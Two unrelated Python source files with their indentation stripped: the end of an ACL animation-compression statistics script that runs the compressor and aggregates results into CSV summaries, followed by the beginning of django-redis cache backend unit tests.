if 'stats_bit_rate_csv_file' in csv_data:
csv_data['stats_bit_rate_csv_file'].close()
if 'stats_animated_size_csv_file' in csv_data:
csv_data['stats_animated_size_csv_file'].close()
if 'stats_error_csv_file' in csv_data:
csv_data['stats_error_csv_file'].close()
def append_csv(csv_data, job_data):
if 'stats_summary_csv_file' in csv_data:
data = job_data['stats_summary_data']
for (clip_name, algo_name, raw_size, compressed_size, compression_ratio, compression_time, duration, num_animated_tracks, max_error, num_transforms, num_samples_per_track, quantization_memory_usage) in data:
print('{}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}'.format(clip_name, algo_name, raw_size, compressed_size, compression_ratio, compression_time, duration, num_animated_tracks, max_error, num_transforms, num_samples_per_track, quantization_memory_usage), file = csv_data['stats_summary_csv_file'])
if 'stats_animated_size_csv_file' in csv_data:
size_data = job_data['stats_animated_size']
for (name, segment_index, animated_size, num_animated) in size_data:
print('{}, {}, {}, {}'.format(name, segment_index, animated_size, num_animated), file = csv_data['stats_animated_size_csv_file'])
if 'stats_error_csv_file' in csv_data:
error_data = job_data['stats_error_data']
for (name, segment_index, data) in error_data:
key_frame = 0
for frame_errors in data:
bone_index = 0
for bone_error in frame_errors:
print('{}, {}, {}, {}'.format(name, key_frame, bone_index, bone_error), file = csv_data['stats_error_csv_file'])
bone_index += 1
key_frame += 1
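# write_csv converts the aggregated per-algorithm bit rate counts into percentages
# of the total before writing them to the bit rate CSV.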
def write_csv(csv_data, agg_data):
if 'stats_bit_rate_csv_file' in csv_data:
for algorithm_uid, algo_data in agg_data.items():
total_count = float(sum(algo_data['bit_rates']))
if total_count <= 0.0:
inv_total_count = 0.0 # Clamp to zero if a bit rate isn't used
else:
inv_total_count = 1.0 / total_count
print('{}, {}'.format(algo_data['csv_name'], ', '.join([str((float(x) * inv_total_count) * 100.0) for x in algo_data['bit_rates']])), file = csv_data['stats_bit_rate_csv_file'])
def print_progress(iteration, total, prefix='', suffix='', decimals = 1, bar_length = 40):
# Taken from https://stackoverflow.com/questions/3173320/text-progress-bar-in-the-console
# With minor tweaks
"""
Call in a loop to create terminal progress bar
@params:
iteration - Required : current iteration (Int)
total - Required : total iterations (Int)
prefix - Optional : prefix string (Str)
suffix - Optional : suffix string (Str)
decimals - Optional : positive number of decimals in percent complete (Int)
bar_length - Optional : character length of bar (Int)
"""
str_format = "{0:." + str(decimals) + "f}"
percents = str_format.format(100 * (iteration / float(total)))
filled_length = int(round(bar_length * iteration / float(total)))
bar = '█' * filled_length + '-' * (bar_length - filled_length)
# We need to clear any previous line we might have to ensure we have no visual artifacts
# Note that if this function is called too quickly, the text might flicker
terminal_width = 80
sys.stdout.write('{}\r'.format(' ' * terminal_width))
sys.stdout.flush()
sys.stdout.write('%s |%s| %s%s %s\r' % (prefix, bar, percents, '%', suffix))
sys.stdout.flush()
if iteration == total:
sys.stdout.write('\n')
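# Worker thread body: pulls (acl_filename, command) pairs from cmd_queue and runs
# the compressor executable until a None sentinel is received; every processed
# clip is reported back through result_queue so the main thread can track progress.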
def run_acl_compressor(cmd_queue, result_queue):
while True:
entry = cmd_queue.get()
if entry is None:
return
(acl_filename, cmd) = entry
result = os.system(cmd)
if result != 0:
print('Failed to execute cmd: {}'.format(cmd))
result_queue.put(acl_filename)
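# Walks the ACL input directory tree, builds one compressor command per *.acl.sjson
# clip (skipping clips whose stat file already exists unless -refresh is used) and
# runs the commands on 'num_threads' worker threads while displaying progress.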
def compress_clips(options):
acl_dir = options['acl']
stat_dir = options['stats']
if platform.system() == 'Windows':
stat_dir = '\\\\?\\{}'.format(stat_dir)
refresh = options['refresh']
if platform.system() == 'Windows':
compressor_exe_path = '../../build/bin/acl_compressor.exe'
else:
compressor_exe_path = '../../build/bin/acl_compressor'
compressor_exe_path = os.path.abspath(compressor_exe_path)
if not os.path.exists(compressor_exe_path):
print('Compressor exe not found: {}'.format(compressor_exe_path))
sys.exit(1)
stat_files = []
cmd_queue = queue.Queue()
out_dir = None
if len(options['out']) != 0:
if not os.path.exists(options['out']):
os.makedirs(options['out'])
if os.path.exists(options['out']) and os.path.isdir(options['out']):
out_dir = options['out']
for (dirpath, dirnames, filenames) in os.walk(acl_dir):
stat_dirname = dirpath.replace(acl_dir, stat_dir)
for filename in filenames:
if not filename.endswith('.acl.sjson'):
continue
acl_filename = os.path.join(dirpath, filename)
stat_filename = os.path.join(stat_dirname, filename.replace('.acl.sjson', '_stats.sjson'))
stat_files.append(stat_filename)
if os.path.exists(stat_filename) and os.path.isfile(stat_filename) and not refresh:
continue
if not os.path.exists(stat_dirname):
os.makedirs(stat_dirname)
stat_filename = stat_filename.replace('\\\\?\\', '')
cmd = '{} -acl="{}" -stats="{}" -level={}'.format(compressor_exe_path, acl_filename, stat_filename, options['level'])
if out_dir:
out_filename = os.path.join(options['out'], filename.replace('.acl.sjson', '.acl.bin'))
cmd = '{} -out="{}"'.format(cmd, out_filename)
if options['stat_detailed']:
cmd = '{} -stat_detailed'.format(cmd)
if options['stat_exhaustive']:
cmd = '{} -stat_exhaustive'.format(cmd)
if platform.system() == 'Windows':
cmd = cmd.replace('/', '\\')
cmd_queue.put((acl_filename, cmd))
if len(stat_files) == 0:
print("No ACL clips found to compress")
sys.exit(0)
if not cmd_queue.empty():
# Add a marker to terminate the threads
for i in range(options['num_threads']):
cmd_queue.put(None)
result_queue = queue.Queue()
compression_start_time = time.perf_counter()
threads = [ threading.Thread(target = run_acl_compressor, args = (cmd_queue, result_queue)) for _i in range(options['num_threads']) ]
for thread in threads:
thread.daemon = True
thread.start()
if options['has_progress_bar']:
print_progress(0, len(stat_files), 'Compressing clips:', '{} / {}'.format(0, len(stat_files)))
try:
while True:
for thread in threads:
thread.join(1.0)
num_processed = result_queue.qsize()
if options['has_progress_bar']:
print_progress(num_processed, len(stat_files), 'Compressing clips:', '{} / {}'.format(num_processed, len(stat_files)))
all_threads_done = True
for thread in threads:
if thread.is_alive():
all_threads_done = False
if all_threads_done:
break
except KeyboardInterrupt:
sys.exit(1)
compression_end_time = time.perf_counter()
print()
print('Compressed {} clips in {}'.format(len(stat_files), format_elapsed_time(compression_end_time - compression_start_time)))
return stat_files
def shorten_rotation_format(format):
if format == 'quatf_full':
return 'R:Quat'
elif format == 'quatf_drop_w_full':
return 'R:QuatNoW96'
elif format == 'QuatDropW_48':
return 'R:QuatNoW48'
elif format == 'QuatDropW_32':
return 'R:QuatNoW32'
elif format == 'quatf_drop_w_variable':
return 'R:QuatNoWVar'
else:
return 'R:???'
def shorten_translation_format(format):
if format == 'vector3f_full':
return 'T:Vec3_96'
elif format == 'Vector3_48':
return 'T:Vec3_48'
elif format == 'Vector3_32':
return 'T:Vec3_32'
elif format == 'vector3f_variable':
return 'T:Vec3Var'
else:
return 'T:???'
def shorten_scale_format(format):
if format == 'vector3f_full':
return 'S:Vec3_96'
elif format == 'Vector3_48':
return 'S:Vec3_48'
elif format == 'Vector3_32':
return 'S:Vec3_32'
elif format == 'vector3f_variable':
return 'S:Vec3Var'
else:
return 'S:???'
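# Accumulates the statistics of a single run (sizes, compression time, max error,
# bit rate histogram) into one aggregate entry per algorithm UID.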
def aggregate_stats(agg_run_stats, run_stats):
algorithm_uid = run_stats['algorithm_uid']
if not algorithm_uid in agg_run_stats:
agg_data = {}
agg_data['name'] = run_stats['desc']
agg_data['csv_name'] = run_stats['csv_desc']
agg_data['total_raw_size'] = 0
agg_data['total_compressed_size'] = 0
agg_data['total_compression_time'] = 0.0
agg_data['total_duration'] = 0.0
agg_data['max_error'] = 0
agg_data['num_runs'] = 0
agg_data['bit_rates'] = [0] * 19
agg_run_stats[algorithm_uid] = agg_data
agg_data = agg_run_stats[algorithm_uid]
agg_data['total_raw_size'] += run_stats['raw_size']
agg_data['total_compressed_size'] += run_stats['compressed_size']
agg_data['total_compression_time'] += run_stats['compression_time']
agg_data['total_duration'] += run_stats['duration']
agg_data['max_error'] = max(agg_data['max_error'], run_stats['max_error'])
agg_data['num_runs'] += 1
if 'segments' in run_stats and len(run_stats['segments']) > 0:
for segment in run_stats['segments']:
if 'bit_rate_counts' in segment:
for i in range(19):
agg_data['bit_rates'][i] += segment['bit_rate_counts'][i]
def track_best_runs(best_runs, run_stats):
if run_stats['max_error'] < best_runs['best_error']:
best_runs['best_error'] = run_stats['max_error']
best_runs['best_error_entry'] = run_stats
if run_stats['compression_ratio'] > best_runs['best_ratio']:
best_runs['best_ratio'] = run_stats['compression_ratio']
best_runs['best_ratio_entry'] = run_stats
def track_worst_runs(worst_runs, run_stats):
if run_stats['max_error'] > worst_runs['worst_error']:
worst_runs['worst_error'] = run_stats['max_error']
worst_runs['worst_error_entry'] = run_stats
if run_stats['compression_ratio'] < worst_runs['worst_ratio']:
worst_runs['worst_ratio'] = run_stats['compression_ratio']
worst_runs['worst_ratio_entry'] = run_stats
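# Job body executed in a separate process: parses stat SJSON files pulled from
# stat_queue, aggregates their statistics and reports progress and the final
# results back through result_queue.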
def run_stat_parsing(options, stat_queue, result_queue):
#signal.signal(signal.SIGINT, signal.SIG_IGN)
try:
agg_run_stats = {}
best_runs = {}
best_runs['best_error'] = 100000000.0
best_runs['best_error_entry'] = None
best_runs['best_ratio'] = 0.0
best_runs['best_ratio_entry'] = None
worst_runs = {}
worst_runs['worst_error'] = -100000000.0
worst_runs['worst_error_entry'] = None
worst_runs['worst_ratio'] = 100000000.0
worst_runs['worst_ratio_entry'] = None
num_runs = 0
total_compression_time = 0.0
stats_summary_data = []
stats_error_data = []
stats_animated_size = []
bone_error_values = []
compression_times = []
while True:
stat_filename = stat_queue.get()
if stat_filename is None:
break
with open(stat_filename, 'r') as file:
try:
file_data = sjson.loads(file.read())
runs = file_data['runs']
for run_stats in runs:
if len(run_stats) == 0:
continue
run_stats['filename'] = stat_filename.replace('\\\\?\\', '')
run_stats['clip_name'] = os.path.splitext(os.path.basename(stat_filename))[0]
run_stats['rotation_format'] = shorten_rotation_format(run_stats['rotation_format'])
run_stats['translation_format'] = shorten_translation_format(run_stats['translation_format'])
run_stats['scale_format'] = shorten_scale_format(run_stats['scale_format'])
if isinstance(run_stats['duration'], str):
run_stats['duration'] = 0.0
if 'segmenting' in run_stats:
run_stats['desc'] = '{}|{}|{}'.format(run_stats['rotation_format'], run_stats['translation_format'], run_stats['scale_format'])
run_stats['csv_desc'] = '{}|{}|{}'.format(run_stats['rotation_format'], run_stats['translation_format'], run_stats['scale_format'])
else:
run_stats['desc'] = '{}|{}|{}'.format(run_stats['rotation_format'], run_stats['translation_format'], run_stats['scale_format'])
run_stats['csv_desc'] = '{}|{}|{}'.format(run_stats['rotation_format'], run_stats['translation_format'], run_stats['scale_format'])
aggregate_stats(agg_run_stats, run_stats)
track_best_runs(best_runs, run_stats)
track_worst_runs(worst_runs, run_stats)
num_runs += 1
total_compression_time += run_stats['compression_time']
compression_times.append(run_stats['compression_time'])
if options['csv_summary']:
#(clip_name, algo_name, raw_size, compressed_size, compression_ratio, compression_time, duration, num_animated_tracks, max_error, num_transforms, num_samples_per_track, quantization_memory_usage)
num_transforms = run_stats['num_bones']
num_samples_per_track = run_stats['num_samples']
num_animated_tracks = run_stats.get('num_animated_tracks', 0)
quantization_memory_usage = run_stats.get('track_bit_rate_database_size', 0) + run_stats.get('transform_cache_size', 0)
data = (run_stats['clip_name'], run_stats['csv_desc'], run_stats['raw_size'], run_stats['compressed_size'], run_stats['compression_ratio'], run_stats['compression_time'], run_stats['duration'], num_animated_tracks, run_stats['max_error'], num_transforms, num_samples_per_track, quantization_memory_usage)
stats_summary_data.append(data)
if 'segments' in run_stats and len(run_stats['segments']) > 0:
segment_index = 0
for segment in run_stats['segments']:
if 'animated_frame_size' in segment and options['csv_animated_size']:
stats_animated_size.append((run_stats['clip_name'], segment_index, segment['animated_frame_size'], run_stats['num_animated_tracks']))
if 'error_per_frame_and_bone' in segment and len(segment['error_per_frame_and_bone']) > 0:
# Convert to array, lower memory footprint and more efficient
if options['csv_error']:
#(name, segment_index, data)
data = (run_stats['clip_name'], segment_index, segment['error_per_frame_and_bone'])
stats_error_data.append(data)
for frame_error_values in segment['error_per_frame_and_bone']:
bone_error_values.extend([float(v) for v in frame_error_values])
# Data isn't needed anymore, discard it
segment['error_per_frame_and_bone'] = []
segment_index += 1
result_queue.put(('progress', stat_filename))
except sjson.ParseException:
print('Failed to parse SJSON file: {}'.format(stat_filename))
# Done
results = {}
results['agg_run_stats'] = agg_run_stats
results['best_runs'] = best_runs
results['worst_runs'] = worst_runs
results['num_runs'] = num_runs
results['total_compression_time'] = total_compression_time
results['stats_summary_data'] = stats_summary_data
results['stats_error_data'] = stats_error_data
results['stats_animated_size'] = stats_animated_size
results['bone_error_values'] = bone_error_values
results['compression_times'] = compression_times
result_queue.put(('done', results))
except KeyboardInterrupt:
print('Interrupted')
def pretty_print(d, indent = 0):
for key, value in d.items():
if isinstance(value, dict):
print('\t' * indent + str(key))
pretty_print(value, indent + 1)
else:
print('\t' * indent + str(key) + ': ' + str(value))
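# Merges the results produced by one parsing job into the overall aggregate,
# combining per-algorithm totals, best/worst runs and the numpy arrays of
# bone errors and compression times.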
def aggregate_job_stats(agg_job_results, job_results):
if job_results['num_runs'] == 0:
return
if len(agg_job_results) == 0:
# Convert array to numpy array
job_results['bone_error_values'] = numpy.array(job_results['bone_error_values'])
job_results['compression_times'] = numpy.array(job_results['compression_times'])
agg_job_results.update(job_results)
else:
agg_job_results['num_runs'] += job_results['num_runs']
agg_job_results['total_compression_time'] += job_results['total_compression_time']
for key in job_results['agg_run_stats'].keys():
if not key in agg_job_results['agg_run_stats']:
agg_job_results['agg_run_stats'][key] = job_results['agg_run_stats'][key].copy()
else:
agg_job_results['agg_run_stats'][key]['total_raw_size'] += job_results['agg_run_stats'][key]['total_raw_size']
agg_job_results['agg_run_stats'][key]['total_compressed_size'] += job_results['agg_run_stats'][key]['total_compressed_size']
agg_job_results['agg_run_stats'][key]['total_compression_time'] += job_results['agg_run_stats'][key]['total_compression_time']
agg_job_results['agg_run_stats'][key]['total_duration'] += job_results['agg_run_stats'][key]['total_duration']
agg_job_results['agg_run_stats'][key]['max_error'] = max(agg_job_results['agg_run_stats'][key]['max_error'], job_results['agg_run_stats'][key]['max_error'])
agg_job_results['agg_run_stats'][key]['num_runs'] += job_results['agg_run_stats'][key]['num_runs']
for i in range(19):
agg_job_results['agg_run_stats'][key]['bit_rates'][i] += job_results['agg_run_stats'][key]['bit_rates'][i]
if job_results['best_runs']['best_error'] < agg_job_results['best_runs']['best_error']:
agg_job_results['best_runs']['best_error'] = job_results['best_runs']['best_error']
agg_job_results['best_runs']['best_error_entry'] = job_results['best_runs']['best_error_entry']
if job_results['best_runs']['best_ratio'] > agg_job_results['best_runs']['best_ratio']:
agg_job_results['best_runs']['best_ratio'] = job_results['best_runs']['best_ratio']
agg_job_results['best_runs']['best_ratio_entry'] = job_results['best_runs']['best_ratio_entry']
if job_results['worst_runs']['worst_error'] > agg_job_results['worst_runs']['worst_error']:
agg_job_results['worst_runs']['worst_error'] = job_results['worst_runs']['worst_error']
agg_job_results['worst_runs']['worst_error_entry'] = job_results['worst_runs']['worst_error_entry']
if job_results['worst_runs']['worst_ratio'] < agg_job_results['worst_runs']['worst_ratio']:
agg_job_results['worst_runs']['worst_ratio'] = job_results['worst_runs']['worst_ratio']
agg_job_results['worst_runs']['worst_ratio_entry'] = job_results['worst_runs']['worst_ratio_entry']
agg_job_results['bone_error_values'] = numpy.append(agg_job_results['bone_error_values'], job_results['bone_error_values'])
agg_job_results['compression_times'] = numpy.append(agg_job_results['compression_times'], job_results['compression_times'])
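# Percentage of entries in 'values' (a numpy array) that are strictly below 'value',
# e.g. percentile_rank(numpy.array([1.0, 2.0, 3.0, 4.0]), 3.0) returns 50.0.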
def percentile_rank(values, value):
return (values < value).mean() * 100.0
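# Main flow: compress every clip, then parse the resulting stat files in parallel
# processes, aggregate the results, write the requested CSV files and print a
# summary of sizes, ratios, errors and timings.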
if __name__ == "__main__":
if sys.version_info < (3, 4):
print('Python 3.4 or higher needed to run this script')
sys.exit(1)
options = parse_argv()
stat_files = compress_clips(options)
csv_data = create_csv(options)
aggregating_start_time = time.perf_counter()
stat_queue = multiprocessing.Queue()
for stat_filename in stat_files:
stat_queue.put(stat_filename)
# Add a marker to terminate the jobs
for i in range(options['num_threads']):
stat_queue.put(None)
result_queue = multiprocessing.Queue()
jobs = [ multiprocessing.Process(target = run_stat_parsing, args = (options, stat_queue, result_queue)) for _i in range(options['num_threads']) ]
for job in jobs:
job.start()
agg_job_results = {}
num_stat_file_processed = 0
if options['has_progress_bar']:
print_progress(num_stat_file_processed, len(stat_files), 'Aggregating results:', '{} / {}'.format(num_stat_file_processed, len(stat_files)))
try:
while True:
try:
(msg, data) = result_queue.get(True, 1.0)
if msg == 'progress':
num_stat_file_processed += 1
if options['has_progress_bar']:
print_progress(num_stat_file_processed, len(stat_files), 'Aggregating results:', '{} / {}'.format(num_stat_file_processed, len(stat_files)))
elif msg == 'done':
aggregate_job_stats(agg_job_results, data)
append_csv(csv_data, data)
except queue.Empty:
all_jobs_done = True
for job in jobs:
if job.is_alive():
all_jobs_done = False
if all_jobs_done:
break
except KeyboardInterrupt:
sys.exit(1)
agg_run_stats = agg_job_results['agg_run_stats']
best_runs = agg_job_results['best_runs']
worst_runs = agg_job_results['worst_runs']
num_runs = agg_job_results['num_runs']
write_csv(csv_data, agg_run_stats)
aggregating_end_time = time.perf_counter()
print()
print('Found {} runs in {}'.format(num_runs, format_elapsed_time(aggregating_end_time - aggregating_start_time)))
print()
close_csv(csv_data)
print('Stats per run type:')
run_types_by_size = sorted(agg_run_stats.values(), key = lambda entry: entry['total_compressed_size'])
for run_stats in run_types_by_size:
ratio = float(run_stats['total_raw_size']) / float(run_stats['total_compressed_size'])
print('Compressed {:.2f} MB, Elapsed {}, Ratio [{:.2f} : 1], Max error [{:.4f}] Run type: {}'.format(bytes_to_mb(run_stats['total_compressed_size']), format_elapsed_time(run_stats['total_compression_time']), ratio, run_stats['max_error'], run_stats['name']))
print()
print('Total:')
total_raw_size = sum([x['total_raw_size'] for x in agg_run_stats.values()])
total_compressed_size = sum([x['total_compressed_size'] for x in agg_run_stats.values()])
total_compression_time = sum([x['total_compression_time'] for x in agg_run_stats.values()])
total_max_error = max([x['max_error'] for x in agg_run_stats.values()])
total_ratio = float(total_raw_size) / float(total_compressed_size)
print('Compressed {:.2f} MB, Elapsed {}, Ratio [{:.2f} : 1], Max error [{:.4f}]'.format(bytes_to_mb(total_compressed_size), format_elapsed_time(total_compression_time), total_ratio, total_max_error))
print()
total_duration = sum([x['total_duration'] for x in agg_run_stats.values()])
print('Sum of clip durations: {}'.format(format_elapsed_time(total_duration)))
print('Total compression time: {} ({:.3f} seconds)'.format(format_elapsed_time(total_compression_time), total_compression_time))
print('Total raw size: {:.2f} MB'.format(bytes_to_mb(total_raw_size)))
print('Compression speed: {:.2f} KB/sec'.format(bytes_to_kb(total_raw_size) / total_compression_time))
print('Compression time 50, 85, 99th percentile: {:.3f}, {:.3f}, {:.3f} seconds'.format(numpy.percentile(agg_job_results['compression_times'], 50.0), numpy.percentile(agg_job_results['compression_times'], 85.0), numpy.percentile(agg_job_results['compression_times'], 99.0)))
if len(agg_job_results['bone_error_values']) > 0:
print('Bone error 99th percentile: {:.4f}'.format(numpy.percentile(agg_job_results['bone_error_values'], 99.0)))
print('Error threshold percentile rank: {:.2f} (0.01)'.format(percentile_rank(agg_job_results['bone_error_values'], 0.01)))
print()
print('Most accurate: {}'.format(best_runs['best_error_entry']['filename']))
print_stat(best_runs['best_error_entry'])
print('Best ratio: {}'.format(best_runs['best_ratio_entry']['filename']))
print_stat(best_runs['best_ratio_entry'])
print('Least accurate: {}'.format(worst_runs['worst_error_entry']['filename']))
print_stat(worst_runs['worst_error_entry'])
print('Worst ratio: {}'.format(worst_runs['worst_ratio_entry']['filename']))
print_stat(worst_runs['worst_ratio_entry'])
|
test_backend.py
|
import base64
import copy
import datetime
import threading
import time
import unittest
from datetime import timedelta
from unittest.mock import Mock, patch
from django import VERSION
from django.conf import settings
from django.contrib.sessions.backends.cache import SessionStore as CacheSession
from django.core.cache import DEFAULT_CACHE_ALIAS, cache, caches
from django.test import override_settings
from django.utils import timezone
from redis.exceptions import ConnectionError
import django_redis.cache
from django_redis import pool
from django_redis.client import DefaultClient, ShardClient, herd
from django_redis.serializers.json import JSONSerializer
from django_redis.serializers.msgpack import MSGPackSerializer
herd.CACHE_HERD_TIMEOUT = 2
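# Custom key functions used by the KEY_FUNCTION tests below: keys are stored as
# '<prefix>#<version>#<key>' and reverse_key strips the prefix and version again.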
def make_key(key, prefix, version):
return "{}#{}#{}".format(prefix, version, key)
def reverse_key(key):
return key.split("#", 2)[2]
class DjangoRedisConnectionStrings(unittest.TestCase):
def setUp(self):
self.cf = pool.get_connection_factory(options={})
self.constring4 = "unix://tmp/foo.bar?db=1"
self.constring5 = "redis://localhost/2"
self.constring6 = "rediss://localhost:3333?db=2"
def test_new_connection_strings(self):
res1 = self.cf.make_connection_params(self.constring4)
res2 = self.cf.make_connection_params(self.constring5)
res3 = self.cf.make_connection_params(self.constring6)
self.assertEqual(res1["url"], self.constring4)
self.assertEqual(res2["url"], self.constring5)
self.assertEqual(res3["url"], self.constring6)
class DjangoRedisCacheTestEscapePrefix(unittest.TestCase):
def setUp(self):
caches_setting = copy.deepcopy(settings.CACHES)
caches_setting["default"]["KEY_PREFIX"] = "*"
cm = override_settings(CACHES=caches_setting)
cm.enable()
self.addCleanup(cm.disable)
self.cache = caches["default"]
try:
self.cache.clear()
except Exception:
pass
self.other = caches["with_prefix"]
try:
self.other.clear()
except Exception:
pass
def test_delete_pattern(self):
self.cache.set("a", "1")
self.other.set("b", "2")
self.cache.delete_pattern("*")
self.assertIs(self.cache.has_key("a"), False)
self.assertEqual(self.other.get("b"), "2")
def test_iter_keys(self):
if isinstance(self.cache.client, ShardClient):
self.skipTest("ShardClient doesn't support iter_keys")
self.cache.set("a", "1")
self.other.set("b", "2")
self.assertEqual(list(self.cache.iter_keys("*")), ["a"])
def test_keys(self):
self.cache.set("a", "1")
self.other.set("b", "2")
keys = self.cache.keys("*")
self.assertIn("a", keys)
self.assertNotIn("b", keys)
class DjangoRedisCacheTestCustomKeyFunction(unittest.TestCase):
def setUp(self):
caches_setting = copy.deepcopy(settings.CACHES)
caches_setting["default"]["KEY_FUNCTION"] = "test_backend.make_key"
caches_setting["default"]["REVERSE_KEY_FUNCTION"] = "test_backend.reverse_key"
cm = override_settings(CACHES=caches_setting)
cm.enable()
self.addCleanup(cm.disable)
self.cache = caches["default"]
try:
self.cache.clear()
except Exception:
pass
def test_custom_key_function(self):
if isinstance(self.cache.client, ShardClient):
self.skipTest("ShardClient doesn't support get_client")
for key in ["foo-aa", "foo-ab", "foo-bb", "foo-bc"]:
self.cache.set(key, "foo")
res = self.cache.delete_pattern("*foo-a*")
self.assertTrue(bool(res))
keys = self.cache.keys("foo*")
self.assertEqual(set(keys), {"foo-bb", "foo-bc"})
# ensure our custom function was actually called
self.assertEqual(
{k.decode() for k in self.cache.client.get_client(write=False).keys("*")},
{"#1#foo-bc", "#1#foo-bb"},
)
class DjangoRedisCacheTests(unittest.TestCase):
def setUp(self):
self.cache = cache
try:
self.cache.clear()
except Exception:
pass
def test_setnx(self):
# we should ensure there is no test_key_nx in redis
self.cache.delete("test_key_nx")
res = self.cache.get("test_key_nx")
self.assertIsNone(res)
res = self.cache.set("test_key_nx", 1, nx=True)
self.assertTrue(res)
# test that a second set with nx=True does not overwrite the value
res = self.cache.set("test_key_nx", 2, nx=True)
self.assertFalse(res)
res = self.cache.get("test_key_nx")
self.assertEqual(res, 1)
self.cache.delete("test_key_nx")
res = self.cache.get("test_key_nx")
self.assertIsNone(res)
def test_setnx_timeout(self):
# test that timeout still works for nx=True
res = self.cache.set("test_key_nx", 1, timeout=2, nx=True)
self.assertTrue(res)
time.sleep(3)
res = self.cache.get("test_key_nx")
self.assertIsNone(res)
# test that timeout will not affect key, if it was there
self.cache.set("test_key_nx", 1)
res = self.cache.set("test_key_nx", 2, timeout=2, nx=True)
self.assertFalse(res)
time.sleep(3)
res = self.cache.get("test_key_nx")
self.assertEqual(res, 1)
self.cache.delete("test_key_nx")
res = self.cache.get("test_key_nx")
self.assertIsNone(res)
def test_unicode_keys(self):
self.cache.set("ключ", "value")
res = self.cache.get("ключ")
self.assertEqual(res, "value")
def test_save_and_integer(self):
self.cache.set("test_key", 2)
res = self.cache.get("test_key", "Foo")
self.assertIsInstance(res, int)
self.assertEqual(res, 2)
def test_save_string(self):
self.cache.set("test_key", "hello" * 1000)
res = self.cache.get("test_key")
self.assertIsInstance(res, str)
self.assertEqual(res, "hello" * 1000)
self.cache.set("test_key", "2")
res = self.cache.get("test_key")
self.assertIsInstance(res, str)
self.assertEqual(res, "2")
def test_save_unicode(self):
self.cache.set("test_key", "heló")
res = self.cache.get("test_key")
self.assertIsInstance(res, str)
self.assertEqual(res, "heló")
def test_save_dict(self):
if isinstance(
self.cache.client._serializer, (JSONSerializer, MSGPackSerializer)
):
# JSONSerializer and MSGPackSerializer use the isoformat for
# datetimes.
now_dt = datetime.datetime.now().isoformat()
else:
now_dt = datetime.datetime.now()
test_dict = {"id": 1, "date": now_dt, "name": "Foo"}
self.cache.set("test_key", test_dict)
res = self.cache.get("test_key")
self.assertIsInstance(res, dict)
self.assertEqual(res["id"], 1)
self.assertEqual(res["name"], "Foo")
self.assertEqual(res["date"], now_dt)
def test_save_float(self):
float_val = 1.345620002
self.cache.set("test_key", float_val)
res = self.cache.get("test_key")
self.assertIsInstance(res, float)
self.assertEqual(res, float_val)
def test_timeout(self):
self.cache.set("test_key", 222, timeout=3)
time.sleep(4)
res = self.cache.get("test_key")
self.assertIsNone(res)
def test_timeout_0(self):
self.cache.set("test_key", 222, timeout=0)
res = self.cache.get("test_key")
self.assertIsNone(res)
def test_timeout_parameter_as_positional_argument(self):
self.cache.set("test_key", 222, -1)
res = self.cache.get("test_key")
self.assertIsNone(res)
self.cache.set("test_key", 222, 1)
res1 = self.cache.get("test_key")
time.sleep(2)
res2 = self.cache.get("test_key")
self.assertEqual(res1, 222)
self.assertIsNone(res2)
# nx=True should not overwrite expire of key already in db
self.cache.set("test_key", 222, None)
self.cache.set("test_key", 222, -1, nx=True)
res = self.cache.get("test_key")
self.assertEqual(res, 222)
def test_timeout_negative(self):
self.cache.set("test_key", 222, timeout=-1)
res = self.cache.get("test_key")
self.assertIsNone(res)
self.cache.set("test_key", 222, timeout=None)
self.cache.set("test_key", 222, timeout=-1)
res = self.cache.get("test_key")
self.assertIsNone(res)
# nx=True should not overwrite expire of key already in db
self.cache.set("test_key", 222, timeout=None)
self.cache.set("test_key", 222, timeout=-1, nx=True)
res = self.cache.get("test_key")
self.assertEqual(res, 222)
def test_timeout_tiny(self):
self.cache.set("test_key", 222, timeout=0.00001)
res = self.cache.get("test_key")
self.assertIn(res, (None, 222))
def test_set_add(self):
self.cache.set("add_key", "Initial value")
res = self.cache.add("add_key", "New value")
self.assertIs(res, False)
res = cache.get("add_key")
self.assertEqual(res, "Initial value")
res = self.cache.add("other_key", "New value")
self.assertIs(res, True)
def test_get_many(self):
self.cache.set("a", 1)
self.cache.set("b", 2)
self.cache.set("c", 3)
res = self.cache.get_many(["a", "b", "c"])
self.assertEqual(res, {"a": 1, "b": 2, "c": 3})
def test_get_many_unicode(self):
self.cache.set("a", "1")
self.cache.set("b", "2")
self.cache.set("c", "3")
res = self.cache.get_many(["a", "b", "c"])
self.assertEqual(res, {"a": "1", "b": "2", "c": "3"})
def test_set_many(self):
self.cache.set_many({"a": 1, "b": 2, "c": 3})
res = self.cache.get_many(["a", "b", "c"])
self.assertEqual(res, {"a": 1, "b": 2, "c": 3})
def test_set_call_empty_pipeline(self):
if isinstance(self.cache.client, ShardClient):
self.skipTest("ShardClient doesn't support get_client")
pipeline = self.cache.client.get_client(write=True).pipeline()
key = "key"
value = "value"
with patch.object(pipeline, "set") as mocked_set:
self.cache.set(
key, value, client=pipeline,
)
if isinstance(self.cache.client, herd.HerdClient):
default_timeout = self.cache.client._backend.default_timeout
herd_timeout = (default_timeout + herd.CACHE_HERD_TIMEOUT) * 1000
herd_pack_value = self.cache.client._pack(value, default_timeout)
mocked_set.assert_called_once_with(
self.cache.client.make_key(key, version=None),
self.cache.client.encode(herd_pack_value),
nx=False,
px=herd_timeout,
xx=False,
)
else:
mocked_set.assert_called_once_with(
self.cache.client.make_key(key, version=None),
self.cache.client.encode(value),
nx=False,
px=self.cache.client._backend.default_timeout * 1000,
xx=False,
)
def test_delete(self):
self.cache.set_many({"a": 1, "b": 2, "c": 3})
res = self.cache.delete("a")
self.assertTrue(bool(res))
res = self.cache.get_many(["a", "b", "c"])
self.assertEqual(res, {"b": 2, "c": 3})
res = self.cache.delete("a")
self.assertFalse(bool(res))
def test_delete_many(self):
self.cache.set_many({"a": 1, "b": 2, "c": 3})
res = self.cache.delete_many(["a", "b"])
self.assertTrue(bool(res))
res = self.cache.get_many(["a", "b", "c"])
self.assertEqual(res, {"c": 3})
res = self.cache.delete_many(["a", "b"])
self.assertFalse(bool(res))
def test_delete_many_generator(self):
self.cache.set_many({"a": 1, "b": 2, "c": 3})
res = self.cache.delete_many(key for key in ["a", "b"])
self.assertTrue(bool(res))
res = self.cache.get_many(["a", "b", "c"])
self.assertEqual(res, {"c": 3})
res = self.cache.delete_many(["a", "b"])
self.assertFalse(bool(res))
def test_delete_many_empty_generator(self):
res = self.cache.delete_many(key for key in [])
self.assertFalse(bool(res))
def test_incr(self):
if isinstance(self.cache.client, herd.HerdClient):
self.skipTest("HerdClient doesn't support incr")
self.cache.set("num", 1)
self.cache.incr("num")
res = self.cache.get("num")
